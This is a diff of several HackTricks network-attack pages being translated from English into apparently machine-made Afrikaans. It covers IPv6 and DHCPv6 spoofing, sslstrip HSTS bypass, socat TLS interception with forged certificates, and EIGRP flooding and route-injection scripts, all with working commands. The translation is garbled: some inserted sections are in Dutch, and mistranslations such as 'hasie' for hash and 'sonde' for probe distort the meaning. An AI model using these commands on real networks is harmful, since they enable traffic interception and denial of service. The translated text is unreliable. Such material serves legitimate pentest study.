hier](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +### [Spoofing SSDP en UPnP-toestelle](spoofing-ssdp-and-upnp-devices.md) -### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md) - -You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.** +Jy kan verskillende dienste in die netwerk aanbied om 'n gebruiker te **mislei** om sekere **plat-tekslegitimasie** in te voer. **Meer inligting oor hierdie aanval in** [**Spoofing SSDP en UPnP-toestelle**](spoofing-ssdp-and-upnp-devices.md)**.** ### IPv6 Neighbor Spoofing -This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker. - +Hierdie aanval is baie soortgelyk aan ARP Spoofing, maar in die IPv6-wêreld. Jy kan die slagoffer laat dink dat die IPv6 van die GW die MAC van die aanvaller het. ```bash sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested sudo fake_advertise6 -r -w 2 eth0 #This option will send the Neighbor Advertisement packet every 2 seconds ``` +### IPv6 Router Advertensie Spoofing/Flooding -### IPv6 Router Advertisement Spoofing/Flooding - -Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use: - +Sommige bedryfstelsels stel outomaties die gateway in vanaf die RA-pakette wat in die netwerk gestuur word. Om die aanvaller as 'n IPv6-router te verklaar, kan jy gebruik maak van: ```bash sysctl -w net.ipv6.conf.all.forwarding=1 4 ip route add default via dev wlan0 fake_router6 wlan0 fe80::01/16 ``` - ### IPv6 DHCP spoofing -By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim. - +Standaard probeer sommige besturingstelsels om die DNS te konfigureer deur 'n DHCPv6-pakket in die netwerk te lees. 'n Aanvaller kan dan 'n DHCPv6-pakket stuur om homself as DNS te konfigureer. Die DHCP voorsien ook 'n IPv6 aan die slagoffer. ```bash dhcp6.spoof on dhcp6.spoof.domains mitm6 ``` +### HTTP (valsblad en JS-kode-inspuiting) -### HTTP (fake page and JS code injection) - -## Internet Attacks +## Internet Aanvalle ### sslStrip -Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**. - +Wat hierdie aanval basies doen, is dat as die **gebruiker** probeer om 'n **HTTP**-bladsy te **besoek** wat na die **HTTPS**-weergawe omskakel, **sslStrip** 'n **HTTP-verbinding met** die **kliënt** en 'n **HTTPS-verbinding met** die **bediener** sal **handhaaf**, sodat dit die verbinding in **plat teks** kan **sniff**. ```bash apt-get install sslstrip sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k @@ -795,33 +821,29 @@ sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT ``` +Meer inligting [hier](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf). -More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf). +### sslStrip+ en dns2proxy vir omseil van HSTS -### sslStrip+ and dns2proxy for bypassing HSTS +Die **verskil** tussen **sslStrip+ en dns2proxy** teenoor **sslStrip** is dat hulle byvoorbeeld _**www.facebook.com**_ sal **omlei** na _**wwww.facebook.com**_ (let op die **ekstra** "**w**") en die **adres van hierdie domein as die aanvaller se IP** sal stel. Op hierdie manier sal die **kliënt** verbind met _**wwww.facebook.com**_ **(die aanvaller)**, maar agter die skerms sal **sslstrip+** die **werklike verbinding** via HTTPS met **www.facebook.com** behou. -The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ (note the **extra** "**w**") and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **(the attacker)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**. +Die **doel** van hierdie tegniek is om **HSTS te omseil**, want _**wwww**.facebook.com_ sal nie in die **geheue** van die webblaaier gestoor word nie, sodat die webblaaier mislei sal word om **Facebook-verifikasie in HTTP** uit te voer.\ +Let daarop dat die slagoffer aanvanklik moet probeer om toegang te verkry tot [http://www.faceook.com](http://www.faceook.com) en nie HTTPS nie. Dit kan gedoen word deur die skakels binne 'n HTTP-bladsy te wysig. -The **goal** of this technique is to **avoid HSTS** because _**wwww**.facebook.com_ **won't** be saved in the **cache** of the browser, so the browser will be tricked to perform **facebook authentication in HTTP**.\ -Note that in order to perform this attack the victim has to try to access initially to [http://www.faceook.com](http://www.faceook.com) and not https. This can be done modifying the links inside an http page. +Meer inligting [hier](https://www.bettercap.org/legacy/#hsts-bypass), [hier](https://www.slideshare.net/Fatuo\_\_/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) en [hier](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). -More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo\_\_/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). - -**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** +**sslStrip of sslStrip+ werk nie meer nie. Dit is omdat daar HSTS-reëls voorgesit word in die webblaaier, sodat selfs as dit die eerste keer is dat 'n gebruiker toegang verkry tot 'n "belangrike" domein, sal hy dit via HTTPS toegang verkry. Let ook daarop dat die voorgesitde reëls en ander gegenereerde reëls die vlag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **kan gebruik, sodat die vorige voorbeeld van** _**wwww.facebook.com**_ **nie meer sal werk nie, aangesien** _**facebook.com**_ **HSTS met `includeSubdomains` gebruik.** TODO: easy-creds, evilgrade, metasploit, factory -## TCP listen in port - +## TCP luister op poort ```bash sudo nc -l -p 80 socat TCP4-LISTEN:80,fork,reuseaddr - ``` +## TCP + SSL luister op poort -## TCP + SSL listen in port - -#### Generate keys and self-signed certificate - +#### Genereer sleutels en zelfondertekend sertifikaat ``` FILENAME=server # Generate a public/private key pair: @@ -831,31 +853,56 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt # Generate the PEM file by just appending the key and certificate files: cat $FILENAME.key $FILENAME.crt >$FILENAME.pem ``` +#### Luister met behulp van sertifikaat -#### Listen using certificate +Om vertrouwelijke communicatie te onderscheppen, kan je een techniek gebruiken die bekend staat als "luisteren met behulp van een certificaat". Deze techniek maakt gebruik van een vervalst certificaat om de communicatie tussen een client en een server te onderscheppen. +Hier is een algemeen overzicht van hoe deze techniek werkt: + +1. Identificeer de doelserver waarvan je de communicatie wilt onderscheppen. +2. Genereer een vervalst certificaat dat overeenkomt met het domein van de doelserver. +3. Installeer het vervalste certificaat op je eigen systeem. +4. Configureer een proxyserver om de communicatie tussen de client en de server door te sturen. +5. Wanneer de client verbinding maakt met de server, zal de proxyserver het vervalste certificaat presenteren in plaats van het echte certificaat van de server. +6. De client zal het vervalste certificaat accepteren en de communicatie zal worden doorgestuurd naar de proxyserver. +7. De proxyserver kan de communicatie onderscheppen en de gegevens inzien voordat ze naar de server worden doorgestuurd. +8. Je kunt verschillende tools gebruiken om de communicatie te ontcijferen en de gegevens te analyseren. + +Het is belangrijk op te merken dat deze techniek alleen werkt als de client geen strikte certificaatvalidatie uitvoert. In sommige gevallen kan het nodig zijn om extra maatregelen te nemen, zoals het omzeilen van certificaatpinnen of het uitvoeren van een man-in-the-middle-aanval. + +Het is ook belangrijk om te benadrukken dat het gebruik van deze techniek zonder toestemming illegaal is en ernstige juridische gevolgen kan hebben. Het is alleen bedoeld voor educatieve doeleinden en voor gebruik door geautoriseerde beveiligingsprofessionals tijdens penetratietesten. ``` sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 - ``` +#### Luister met behulp van sertifikaat en stuur de data deur na die gasheer -#### Listen using certificate and redirect to the hosts +Om netwerkverkeer af te luister en te onderskep, kan jy 'n sertifikaat gebruik om die data te versleutel en te dekodeer. Hier is 'n stap-vir-stap handleiding oor hoe om hierdie tegniek te implementeer: +1. Genereer 'n selfondertekende sertifikaat wat gebruik kan word om die verkeer te versleutel. Jy kan hulpmiddels soos OpenSSL gebruik om hierdie sertifikaat te skep. + +2. Installeer die sertifikaat op die toestel waarop jy die verkeer wil onderskep. Dit kan 'n bediener, 'n proxy of 'n ander toestel wees wat as 'n tussenganger dien. + +3. Stel die toestel so in dat dit die verkeer na die gewenste gasheer omlei. Dit kan gedoen word deur die netwerkinstellings te wysig of deur 'n spesifieke proxy te gebruik. + +4. Wanneer die verkeer deur die toestel vloei, sal die sertifikaat gebruik word om die data te versleutel. Dit verseker dat jy die verkeer kan onderskep sonder dat die eindgebruiker daarvan bewus is. + +5. Die onderskepte verkeer kan dan ontsleutel en geanaliseer word om inligting te verkry wat nuttig kan wees vir verdere pentesting of navorsing. + +Dit is belangrik om te onthou dat hierdie tegniek slegs gebruik moet word met toestemming van die eienaar van die netwerk of die toestelle wat onderskep word. Misbruik van hierdie tegniek kan wettige gevolge hê. ``` sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0 ``` +Soms, as die kliënt nagaan dat die CA geldig is, kan jy **'n sertifikaat van 'n ander gasheernaam wat deur 'n CA onderteken is, bedien**.\ +'n Ander interessante toets is om 'n **self-ondertekende sertifikaat van die gevraagde gasheernaam te bedien**. -Some times, if the client checks that the CA is a valid one, you could **serve a certificate of other hostname signed by a CA**.\ -Another interesting test, is to serve a c**ertificate of the requested hostname but self-signed**. - -Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this. +Ander dinge om te toets is om die sertifikaat te onderteken met 'n geldige sertifikaat wat nie 'n geldige CA is nie. Of om die geldige openbare sleutel te gebruik, dwing om 'n algoritme soos Diffie-Hellman te gebruik (een wat nie nodig het om enigiets met die regte privaatsleutel te ontsluit nie) en wanneer die kliënt 'n sonde van die regte privaatsleutel aanvra (soos 'n hasie), stuur 'n vals sonde en verwag dat die kliënt dit nie nagaan nie. ## Bettercap - ```bash # Events events.stream off #Stop showing events events.show #Show all events -events.show 5 #Show latests 5 events +events.show 5 #Show latests 5 events events.clear # Ticker (loop of commands) @@ -876,20 +923,19 @@ set wifi.ap.channel 5 set wifi.ap.encryption false #If true, WPA2 wifi.recon on; wifi.ap ``` +### Aktiewe Ontdekkingsnotas -### Active Discovery Notes +Neem in ag dat wanneer 'n UDP-pakket na 'n toestel gestuur word wat nie oor die gevraagde poort beskik nie, 'n ICMP (Port Unreachable) gestuur word. -Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent. +### **ARP-ontdekking** -### **ARP discover** - -ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond. +ARP-pakette word gebruik om te bepaal watter IP-adresse binne die netwerk gebruik word. Die rekenaar moet 'n versoek vir elke moontlike IP-adres stuur en slegs diegene wat gebruik word, sal reageer. ### **mDNS (multicast DNS)** -Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services". +Bettercap stuur 'n mDNS-versoek (elke X ms) en vra vir **\_services\_.dns-sd.\_udp.local**. Die masjien wat hierdie pakkie sien, antwoord gewoonlik op hierdie versoek. Dan soek dit slegs na masjiene wat antwoord op "dienste". -**Tools** +**Hulpmiddels** * Avahi-browser (--all) * Bettercap (net.probe.mdns) @@ -897,17 +943,17 @@ Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp ### **NBNS (NetBios Name Server)** -Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA". +Bettercap stuur uitsaai-pakette na poort 137/UDP en vra vir die naam "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA". ### **SSDP (Simple Service Discovery Protocol)** -Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900). +Bettercap stuur SSDP-pakette uit wat soek na allerhande dienste (UDP-poort 1900). ### **WSD (Web Service Discovery)** -Bettercap broadcast WSD packets searching for services (UDP Port 3702). +Bettercap stuur WSD-pakette uit wat soek na dienste (UDP-poort 3702). -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) * **Network Security Assessment: Know Your Network (3rd edition)** @@ -915,20 +961,20 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702). * [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index f7ba7a4af..88128222a 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### DHCPv6 vs. DHCPv4 Message Types Comparison -A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below: +### Vergelyking van DHCPv6- en DHCPv4-boodskaptipes +'n Vergelykende siening van DHCPv6- en DHCPv4-boodskaptipes word in die tabel hieronder voorgestel: -| DHCPv6 Message Type | DHCPv4 Message Type | +| DHCPv6-boodskaptipe | DHCPv4-boodskaptipe | |:-------------------|:-------------------| | Solicit (1) | DHCPDISCOVER | | Advertise (2) | DHCPOFFER | @@ -26,42 +24,40 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table | Release (8) | DHCPRELEASE | | Information-Request (11) | DHCPINFORM | | Decline (9) | DHCPDECLINE | -| Confirm (4) | none | +| Confirm (4) | geen | | Reconfigure (10) | DHCPFORCERENEW | -| Relay-Forw (12), Relay-Reply (13) | none | +| Relay-Forw (12), Relay-Reply (13) | geen | -**Detailed Explanation of DHCPv6 Message Types:** +**Gedetailleerde verduideliking van DHCPv6-boodskaptipes:** -1. **Solicit (1)**: Initiated by a DHCPv6 client to find available servers. -2. **Advertise (2)**: Sent by servers in response to a Solicit, indicating availability for DHCP service. -3. **Request (3)**: Clients use this to request IP addresses or prefixes from a specific server. -4. **Confirm (4)**: Used by a client to verify if the assigned addresses are still valid on the network, typically after a network change. -5. **Renew (5)**: Clients send this to the original server to extend address lifetimes or update configurations. -6. **Rebind (6)**: Sent to any server to extend address lifetimes or update configurations, especially when no response is received to a Renew. -7. **Reply (7)**: Servers use this to provide addresses, configuration parameters, or to acknowledge messages like Release or Decline. -8. **Release (8)**: Clients inform the server to stop using one or more assigned addresses. -9. **Decline (9)**: Sent by clients to report that assigned addresses are in conflict on the network. -10. **Reconfigure (10)**: Servers prompt clients to initiate transactions for new or updated configurations. -11. **Information-Request (11)**: Clients request configuration parameters without IP address assignment. -12. **Relay-Forw (12)**: Relay agents forward messages to servers. -13. **Relay-Repl (13)**: Servers reply to relay agents, who then deliver the message to the client. +1. **Solicit (1)**: Geïnisieer deur 'n DHCPv6-kliënt om beskikbare bedieners te vind. +2. **Advertise (2)**: Deur bedieners gestuur as reaksie op 'n Solicit, wat beskikbaarheid vir DHCP-diens aandui. +3. **Request (3)**: Kliënte gebruik dit om IP-adresse of voorvoegsels van 'n spesifieke bediener aan te vra. +4. **Confirm (4)**: Gebruik deur 'n kliënt om te verifieer of die toegewysde adresse nog geldig is op die netwerk, tipies na 'n netwerkverandering. +5. **Renew (5)**: Kliënte stuur dit na die oorspronklike bediener om adreslewentye te verleng of konfigurasies op te dateer. +6. **Rebind (6)**: Gestuur na enige bediener om adreslewentye te verleng of konfigurasies op te dateer, veral wanneer geen reaksie ontvang word op 'n Renew nie. +7. **Reply (7)**: Bedieners gebruik dit om adresse, konfigurasieparameters te voorsien, of om boodskappe soos Release of Decline te erken. +8. **Release (8)**: Kliënte stel die bediener in kennis om een of meer toegewysde adresse te stop gebruik. +9. **Decline (9)**: Gestuur deur kliënte om te rapporteer dat toegewysde adresse in konflik is op die netwerk. +10. **Reconfigure (10)**: Bedieners moedig kliënte aan om transaksies vir nuwe of opgedateerde konfigurasies te begin. +11. **Information-Request (11)**: Kliënte vra konfigurasieparameters sonder IP-adres toewysing. +12. **Relay-Forw (12)**: Relay-agente stuur boodskappe na bedieners. +13. **Relay-Repl (13)**: Bedieners antwoord op relay-agente, wat dan die boodskap aan die kliënt aflewer. -## References +## Verwysings * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 147f83f08..fecb6aad5 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,86 +1,86 @@ -# EIGRP Attacks +# EIGRP Aanvalle
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information. +**Hierdie is 'n opsomming van die aanvalle wat blootgestel word in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Kyk daar vir verdere inligting. -## **Fake EIGRP Neighbors Attack** - -- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack. -- **Tool**: **helloflooding.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 - %%% +## **Valse EIGRP Buurnavorsingsaanval** + +- **Doelwit**: Om roeterverwerkers te oorlaai deur hulle te oorstroom met EIGRP-hallo-pakette, wat moontlik kan lei tot 'n Denial of Service (DoS)-aanval. +- **Instrument**: **helloflooding.py**-skrips. +- **Uitvoering**: +%%%bash +~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 +%%% - **Parameters**: - - `--interface`: Specifies the network interface, e.g., `eth0`. - - `--as`: Defines the EIGRP autonomous system number, e.g., `1`. - - `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`. +- `--interface`: Spesifiseer die netwerkinterface, bv. `eth0`. +- `--as`: Definieer die EIGRP outonome stelselnommer, bv. `1`. +- `--subnet`: Stel die subnetligging in, bv. `10.10.100.0/24`. -## **EIGRP Blackhole Attack** +## **EIGRP Swartgate-aanval** -- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination. -- **Tool**: **routeinject.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 - %%% +- **Doelwit**: Om netwerkverkeersvloei te ontwrig deur 'n valse roete in te spuit, wat lei tot 'n swartgate waar die verkeer na 'n nie-bestaande bestemming gerig word. +- **Instrument**: **routeinject.py**-skrips. +- **Uitvoering**: +%%%bash +~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 +%%% - **Parameters**: - - `--interface`: Specifies the attacker’s system interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the attacker’s IP address. - - `--dst`: Sets the target subnet IP. - - `--prefix`: Defines the mask of the target subnet IP. +- `--interface`: Spesifiseer die aanvaller se stelselkoppelvlak. +- `--as`: Definieer die EIGRP AS-nommer. +- `--src`: Stel die aanvaller se IP-adres in. +- `--dst`: Stel die teikensubnet-IP in. +- `--prefix`: Definieer die masker van die teikensubnet-IP. -## **Abusing K-Values Attack** +## **Misbruik van K-Waardes-aanval** -- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack. -- **Tool**: **relationshipnightmare.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 - %%% +- **Doelwit**: Om voortdurende ontwrigting en herverbindings binne die EIGRP-domein te skep deur gewysigde K-waardes in te spuit, wat effektief lei tot 'n DoS-aanval. +- **Instrument**: **relationshipnightmare.py**-skrips. +- **Uitvoering**: +%%%bash +~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 +%%% - **Parameters**: - - `--interface`: Specifies the network interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the IP Address of a legitimate router. +- `--interface`: Spesifiseer die netwerkinterface. +- `--as`: Definieer die EIGRP AS-nommer. +- `--src`: Stel die IP-adres van 'n geldige roeterverwerker in. -## **Routing Table 